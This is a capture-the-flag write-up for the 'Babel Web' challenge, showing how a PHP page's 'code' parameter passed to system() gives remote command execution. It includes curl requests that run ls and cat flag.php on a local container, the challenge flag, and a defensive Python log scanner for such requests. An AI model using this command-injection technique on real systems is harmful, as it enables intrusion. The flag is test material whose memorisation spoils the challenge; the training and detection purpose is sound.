Writeup by aureylz for Babel Web

intro web

December 1, 2023

Challenge

Description

You need to audit this site under construction, and search for a flag.

Challenge instructions

  1. First, download docker-compose.yml:
    curl https://hackropole.fr/challenges/fcsc2020-web-babel-web/docker-compose.public.yml -o docker-compose.yml
  2. Launch the challenge by executing in the same folder:
    docker compose up
  3. Access the challenge at http://localhost:8000/.

Author

Cryptanalyse

First steps

The first thing I usually do is inspect the HTML source of the web page in case there is something interesting:

┌──(aureylz㉿kali)-[~/ctf/hackropole/hackropole_2023/babel_web]
└─$ curl http://127.0.0.1:8000
<html>
	<head>
		<title>Bienvenue à Babel Web!</title>
	</head>
	<body>
		<h1>Bienvenue à Babel Web!</h1>
		La page est en cours de développement, merci de revenir plus tard.
		<!-- <a href="?source=1">source</a> -->
	</body>
</html>

And indeed, there is something interesting in an HTML comment: a commented-out link to ?source=1.

I followed that link (http://127.0.0.1:8000/?source=1) and found this:

<?php
    if (isset($_GET['source'])) {
        @show_source(__FILE__);
    }  else if(isset($_GET['code'])) {
        print("<pre>");
        @system($_GET['code']);
        print("<pre>");
    } else {
?>
<html>
    <head>
        <title>Bienvenue à Babel Web!</title>
    </head>
    <body>
        <h1>Bienvenue à Babel Web!</h1>
        La page est en cours de développement, merci de revenir plus tard.
        <!-- <a href="?source=1">source</a> -->
    </body>
</html>
<?php
    }
?>

PHP code analysis

The PHP script contains two main conditional blocks that check for different query parameters (source and code) in the URL.

  1. Source code disclosure
    • The first if statement checks if the source parameter is set in the URL (isset($_GET['source'])).
    • If it is set, the script uses @show_source(__FILE__); to display the source code of the current PHP file.
    • This feature is likely intended for debugging, but in a real-world scenario, it poses a security risk by revealing the server-side code to anyone who knows to add ?source=1 to the URL.
  2. Remote code execution vulnerability (RCE)
    • The else if statement checks for the presence of the code parameter in the URL (isset($_GET['code'])).
    • If this parameter is present, the script executes the command supplied in the code parameter through @system($_GET['code']);.
    • This is a critical vulnerability as it allows the execution of arbitrary system commands directly from the URL. For example, accessing http://127.0.0.1:8000/?code=ls would execute the ls command on the server.
    • The print("<pre>") calls around the system() call are meant to wrap the command output in preformatted text; note that the second call also prints an opening <pre> instead of </pre>, which is why the responses below show two opening tags.
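Seen from the defender's side, the two parameters analysed above are easy to spot in web server access logs, because a GET request carries them in the query string. The following Python script is an added example written for this writeup, not code from the challenge or its author: it parses combined-format access log lines (the sample lines are constructed, with a timestamp and user agent chosen for illustration), flags any request that sets the source or code parameter, and percent-decodes the value so that cat%20flag.php is reported as the command cat flag.php. It mirrors PHP's isset() semantics by treating an empty value (?code=) as a hit too.

```python
"""Detect requests to the two dangerous query parameters of this index.php
("source" -> show_source, "code" -> system) in access-log lines.
Added example for this writeup; not part of the challenge code."""
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample log lines in the common "combined" format (not real traffic).
SAMPLE_LOG = """\
127.0.0.1 - - [01/Dec/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 312 "-" "curl/8.4.0"
127.0.0.1 - - [01/Dec/2023:10:00:05 +0000] "GET /?source=1 HTTP/1.1" 200 1021 "-" "curl/8.4.0"
127.0.0.1 - - [01/Dec/2023:10:00:09 +0000] "GET /?code=ls HTTP/1.1" 200 41 "-" "curl/8.4.0"
127.0.0.1 - - [01/Dec/2023:10:00:14 +0000] "GET /?code=cat%20flag.php HTTP/1.1" 200 98 "-" "curl/8.4.0"
127.0.0.1 - - [01/Dec/2023:10:00:20 +0000] "GET /?page=about HTTP/1.1" 404 0 "-" "curl/8.4.0"
"""

# ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The two parameters index.php reacts to, with what each one triggers.
DANGEROUS_PARAMS = {
    "source": "source disclosure (show_source)",
    "code": "OS command execution (system)",
}


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    parts = urlsplit(m["target"])
    # parse_qsl percent-decodes values, so "cat%20flag.php" becomes "cat flag.php".
    # keep_blank_values mirrors PHP's isset(): "?code=" still sets the parameter.
    params = dict(parse_qsl(parts.query, keep_blank_values=True))
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "method": m["method"],
        "path": parts.path,
        "status": int(m["status"]),
        "params": params,
    }


def classify(rec):
    """Return (param, label, decoded_value) for each dangerous parameter present."""
    return [
        (name, label, rec["params"][name])
        for name, label in DANGEROUS_PARAMS.items()
        if name in rec["params"]
    ]


def scan(log_text):
    """Scan a whole log and return one finding per dangerous parameter per request."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed or non-HTTP line; skip rather than crash
        for name, label, value in classify(rec):
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "param": name,
                "label": label,
                "value": value,
                "status": rec["status"],
            })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['label']}: "
              f"{f['param']}={f['value']!r} (HTTP {f['status']})")
```

On the sample above the scanner reports three requests: the source disclosure hit and the two command executions, with the decoded command shown for each. Because the page's script uses isset(), an empty value is still reported; a real deployment would feed the parsed records into whatever alerting pipeline is in place rather than printing them.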

Testing the first hypothesis

┌──(aureylz㉿kali)-[~/ctf/hackropole/hackropole_2023/babel_web]
└─$ curl http://127.0.0.1:8000/?code=ls
<pre>flag.php
index.php
<pre>

So the flag is in flag.php; I just need to run cat flag.php. Since the command is passed in the query string, the space has to be URL-encoded as %20:

┌──(aureylz㉿kali)-[~/ctf/hackropole/hackropole_2023/babel_web]
└─$ curl http://127.0.0.1:8000/?code=cat%20flag.php
<pre><?php
	$flag = "FCSC{5d969396bb5592634b31d4f0846d945e4befbb8c470b055ef35c0ac090b9b8b7}";
<pre>